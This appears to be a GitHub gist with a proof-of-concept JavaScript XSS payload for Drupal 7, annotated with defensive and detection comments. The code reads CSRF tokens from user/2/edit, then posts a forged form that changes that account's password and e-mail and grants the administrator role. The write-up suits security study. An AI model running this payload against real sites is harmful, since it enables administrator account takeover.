@greggles
Last active December 1, 2015 20:59
Drupal 7 xss change password
// Proof-of-concept payload: shows how an XSS in a Drupal 7 site can be chained
// into a takeover of the account at user/2. It runs with whatever permissions
// the browsing victim already has, so the case that matters is a victim who is
// allowed to edit other users' accounts (the TODO below is about exactly that).
// Defensive takeaway: form_token / form_build_id only stop cross-origin
// forgeries -- script already running in the site's own origin can simply read
// them out of the form -- so the control that matters is preventing the XSS
// itself (output escaping, CSP) and keeping the number of sessions that can
// edit other users small.
// Test for the presence of jquery.
if (typeof jQuery == 'function') {
// Fetch a correct token from the user edit form because we will need it to
// successfully submit the user edit form later.
// TODO: Include a check to increase the chance that the current user is admin,
// which will reduce the number of access denied error messages in the log.
// NOTE(review): those access-denied log entries are also the detection signal
// for this pattern -- ordinary sessions have no reason to request user/2/edit,
// and neither do admin sessions that did not navigate there by hand.
jQuery.get(Drupal.settings.basePath + 'user/2/edit',
function (data, status) {
if (status == 'success') {
// Extract the token and other required data
// Every match() below is indexed without a null check, so the callback throws
// a TypeError (and nothing is posted) if the response is not the edit form.
var matches = data.match(/name="name" value="([a-zA-Z0-9]*)"/);
var name = matches[1];
// Incident-response note: the e-mail address is changed along with the
// password, so resetting the password alone does not fully restore the account.
var mail = 'greg+evilguy@card.com';
var matches = data.match(/name="form_token" value="([a-zA-Z0-9_-]*)"/);
var token = matches[1];
// Demo output only; a real payload would not announce itself this way.
alert('token: ' + token);
var matches = data.match(/name="form_build_id" value="(form-[a-zA-Z0-9_-]*)"/);
var build_id = matches[1];
alert('build_id: ' + build_id);
// Post the minimum amount of fields. Other fields get their default values.
var payload = {
"name": name,
"mail": mail,
// 1 = active; keeps the account from being left blocked by the resubmit.
"status": 1,
"form_id": 'user_profile_form',
"form_token": token,
"form_build_id" : build_id,
"pass[pass1]": 'hacked',
"pass[pass2]": 'hacked',
// Also grants role id 3 -- in a standard Drupal 7 install that is typically
// the administrator role; confirm against the site's role table.
"roles[3]": 3,
"op" : 'save'
};
console.log(payload);
// Same-origin POST carrying the victim's session cookie, so the server sees an
// ordinary authenticated form submission. Audit trail to look for: password
// and mail changes plus role grants on privileged accounts that the account
// owner did not initiate.
var posting = jQuery.post(Drupal.settings.basePath + 'user/2/edit', payload, function(data) {
console.log(data);
});
// Fires immediately; the POST above is asynchronous and still in flight here.
alert('done');
}
}
);
}
else {
alert('No jquery found? That is odd.');
}